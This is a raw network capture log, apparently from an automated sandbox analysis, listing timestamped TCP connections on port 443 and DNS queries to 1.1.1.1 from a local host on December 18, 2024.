                                                                                        Dec 18, 2024 02:10:59.789323092 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.790774107 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.790867090 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:59.791856050 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:59.791944981 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.792031050 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:59.792049885 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.837215900 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:00.017672062 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.018088102 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:00.018109083 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.019218922 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.019654989 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:00.019845009 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.060216904 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:00.913423061 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.913525105 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.913590908 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:00.914450884 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:00.914468050 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:01.064879894 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:01.064928055 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:01.065009117 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:01.065388918 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:01.065403938 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.275866985 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.276216030 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.276253939 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.277704000 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.277786016 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278245926 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278264046 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278321028 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278327942 CET44349753104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.278381109 CET49753443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278667927 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.278712034 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:02.278789997 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.279016018 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:02.279031038 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.493539095 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.493808031 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:03.493830919 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.494827032 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.494878054 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:03.495265961 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:03.495336056 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.495419025 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:03.495424032 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.537223101 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:04.499703884 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:04.499802113 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:04.499870062 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:04.502178907 CET49756443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:11:04.502201080 CET44349756104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:09.764467955 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:09.764852047 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:09.764914989 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:10.051359892 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:10.051393032 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:10.051481962 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:10.051723957 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:10.051742077 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:10.157013893 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:10.157075882 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.118453979 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.118709087 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.118731022 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.119787931 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.119853973 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.120807886 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.120873928 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.120968103 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.120978117 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.175251007 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.602962017 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.602982044 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.602988005 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.603020906 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.603035927 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.603049040 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.603061914 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.603075027 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.603085995 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.603091955 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.603120089 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.768949032 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.768978119 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.769021034 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.769033909 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.769052029 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.769073009 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.769087076 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.770540953 CET49777443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.770553112 CET4434977713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.915760994 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.915810108 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.915891886 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.916073084 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.916090965 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.943481922 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.943571091 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:12.943646908 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.944155931 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:12.944194078 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.631167889 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.631417036 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.631444931 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.632896900 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.632960081 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.633471012 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.633550882 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.633820057 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.633831978 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.686261892 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.688426018 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.688651085 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.688710928 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.690360069 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.690440893 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.691284895 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.691396952 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.691423893 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.734273911 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:14.734334946 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:14.781296015 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.126720905 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126743078 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126749992 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126781940 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126806021 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126813889 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126822948 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.126840115 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.126852989 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.126852989 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.126888990 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163652897 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163711071 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163748026 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163788080 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163795948 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163805962 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163825035 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163850069 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.163851023 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163851023 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163892984 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163892984 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.163918972 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.293791056 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.293826103 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.293853045 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.293862104 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.293874025 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.293876886 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.293922901 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.294487953 CET49786443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.294504881 CET4434978613.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.336220980 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.336289883 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.336324930 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.336361885 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.336488962 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.336488962 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.388453960 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.388488054 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.388633966 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.388633966 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.388684034 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.388747931 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.513991117 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.514019966 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.514079094 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.514112949 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.514139891 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.514167070 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.551548958 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.551589012 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.551651001 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.551696062 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.551727057 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.551753998 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.563961983 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.563999891 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.564048052 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.564069033 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.564093113 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.564131975 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.564157963 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.564517021 CET49787443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.564547062 CET4434978713.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.708276987 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.708313942 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:15.708381891 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.708769083 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:15.708784103 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.468436956 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.468668938 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.468698025 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.472256899 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.472321987 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.472754002 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.472894907 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.472922087 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.517282963 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.517313004 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.563272953 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.949945927 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950016022 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950037003 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950074911 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.950088978 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950108051 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950112104 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.950141907 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.950148106 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950165987 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.950176954 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:17.950195074 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:17.950227022 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.133502007 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.133549929 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.133588076 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.133619070 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.133634090 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.133676052 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.179213047 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.179256916 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.179296970 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.179308891 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.179333925 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.179357052 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.299352884 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.299405098 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.299443007 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.299453020 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.299483061 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.299508095 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.327802896 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.327847958 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.327904940 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.327910900 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.327939034 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.327964067 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.344027996 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.344078064 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.344135046 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.344151020 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.344213963 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.344214916 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:18.344285965 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.344464064 CET49794443192.168.2.1613.107.246.63
                                                                                        Dec 18, 2024 02:11:18.344475985 CET4434979413.107.246.63192.168.2.16
                                                                                        Dec 18, 2024 02:11:29.197379112 CET4970580192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:11:29.317118883 CET8049705172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:11:58.383960962 CET49824443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:58.384047985 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:11:58.384145975 CET49824443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:58.384458065 CET49824443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:11:58.384493113 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:12:00.102030039 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:12:00.102418900 CET49824443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:12:00.102479935 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:12:00.103666067 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:12:00.104052067 CET49824443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:12:00.104238033 CET44349824142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:12:00.156507015 CET49824443192.168.2.16142.250.181.132
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 18, 2024 02:09:53.568937063 CET53572111.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:53.648900986 CET53568901.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:54.359380007 CET5173453192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:54.359484911 CET5229353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:55.147006989 CET53522931.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:55.148667097 CET53517341.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:56.454663992 CET5416253192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:56.454859972 CET5923753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:56.476988077 CET53569551.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:56.591465950 CET53541621.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:56.592221022 CET53592371.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:58.262728930 CET6098753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:58.263005972 CET6413353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:58.399909973 CET53641331.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:58.399944067 CET53609871.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:59.074861050 CET6443053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:59.075006962 CET5955353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:09:59.211648941 CET53644301.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:09:59.211714029 CET53595531.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.649198055 CET5880953192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:06.649198055 CET6399653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:06.737771988 CET5321453192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:06.738054037 CET5937853192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:06.785964012 CET53588091.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.787358999 CET53639961.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:07.046103001 CET53593781.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:07.065989971 CET53532141.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.495294094 CET4975353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:10.495448112 CET6472053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:10.634526968 CET53647201.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.634586096 CET53574041.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.635138035 CET53497531.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.163536072 CET53639991.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.289472103 CET53564941.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:22.591269970 CET6047753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:22.591439009 CET6173253192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:23.143429041 CET53617321.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:23.143441916 CET53604771.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.609213114 CET5152053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:26.609344006 CET5805553192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:26.609900951 CET4933053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:26.610006094 CET5578853192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:26.746423006 CET53515201.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.746445894 CET53580551.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.746550083 CET53557881.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.746691942 CET53493301.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.848383904 CET6456753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:28.848565102 CET5591953192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:28.985445023 CET53559191.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.988254070 CET53645671.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.370206118 CET6509053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:30.370724916 CET5429553192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:30.382185936 CET6104753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:30.382405043 CET5683653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:30.507102013 CET53650901.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.507430077 CET53542951.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.519228935 CET53610471.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.520126104 CET53568361.1.1.1192.168.2.16
